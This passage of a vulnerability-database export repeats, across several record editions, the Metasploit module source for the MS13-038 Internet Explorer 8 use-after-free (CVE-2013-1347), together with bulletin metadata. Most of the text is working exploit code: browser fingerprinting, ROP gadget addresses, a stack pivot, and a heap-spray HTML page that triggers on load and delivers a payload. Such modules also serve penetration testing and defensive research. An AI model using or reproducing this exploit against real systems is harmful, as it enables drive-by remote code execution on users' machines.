\"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-04T14:16:18", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-06T10:21:41", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-06T10:21:41"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-06T10:21:41", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-06T14:12:26", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-06T14:12:26"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-06T14:12:26", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-11T20:20:30", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-11T20:20:30"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, 